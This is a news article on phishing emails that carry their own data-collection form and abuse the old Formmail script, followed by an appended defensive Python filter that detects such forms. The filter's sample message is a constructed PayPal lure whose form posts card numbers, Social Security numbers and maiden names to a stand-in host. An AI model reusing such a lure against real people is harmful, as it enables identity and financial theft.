Some phishing scammers are skipping the tough work of building realistic-looking Web sites, a security firm said Monday, and are instead taking advantage of an old vulnerability to put forms soliciting confidential data right in their spammed messages.
According to the U.K.-based Internet security and research firm Netcraft, the HTML mail masquerades as a security verification message from PayPal, and asks the recipient to fill out an HTML form that includes fields for credit card account number, Social Security number, and mother's maiden name. "Completing all of the checklist items will automatically restore your account access," the message says.
The mail, of course, is bogus, and the form results are instead mailed to a Yahoo account using a CGI script hosted by a Brazilian hosting service.
"Phishing typically collects data through a site that imitates a bank or online retailer. By including the data collector in an HTML e-mail, the new attack eliminates a step in the process, allowing phishing scams to steal sensitive information without constructing an elaborate fraudulent Web site," said Netcraft in an advisory.
The ploy takes advantage of a known vulnerability in Formmail, a form-to-mail Perl script that was maliciously used in 2001 to generate huge quantities of anonymous spam. Most hosting vendors have since replaced the original with customized versions, or substituted secure scripts like the NMS Project, said Netcraft.
Apparently, the Brazilian host used by these phishers is an exception.
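As an added defensive illustration (not part of the original article), the following Python mail-filter check flags HTML messages that carry their own data-collection form, the pattern Netcraft describes above: a form posting to another host while asking for card numbers, SSNs or a mother's maiden name. The sample message, its addresses and the host are constructed for the example.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message (hypothetical addresses and host): the form that
# collects the data travels inside the mail itself instead of on a web site.
SAMPLE_EML = """\
From: "PayPal Security" <security@example.com>
Content-Type: text/html; charset="us-ascii"

<html><body><p>Completing all of the checklist items will restore your account access.</p>
<form action="http://cgi.example.net/cgi-bin/formmail.pl" method="post">
  <input type="hidden" name="recipient" value="collector@example.com">
  <input name="cardnumber"> <input name="ssn"> <input name="mothers_maiden">
</form></body></html>
"""

SENSITIVE = ("card", "ssn", "social", "maiden", "pin", "passw")  # confidential-data field hints


class FormScanner(HTMLParser):
    # Records each <form> as (action URL, [names of its <input> fields]).
    def __init__(self):
        super().__init__()
        self.forms, self._current = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = (a.get("action") or "", [])
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current[1].append((a.get("name") or "").lower())


def embedded_form_risk(raw_message):
    # Return action URLs of forms that post to another host and request sensitive fields.
    msg = email.message_from_string(raw_message, policy=policy.default)
    flagged = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        scanner = FormScanner()
        scanner.feed(part.get_content())
        for action, names in scanner.forms:
            off_site = bool(urlparse(action).netloc)
            sensitive = any(k in n for n in names for k in SENSITIVE)
            if off_site and sensitive:
                flagged.append(action)
    return flagged
```

A gateway would quarantine or tag any message for which the list is non-empty; plain-text mail and forms that post back to the sending site are left alone.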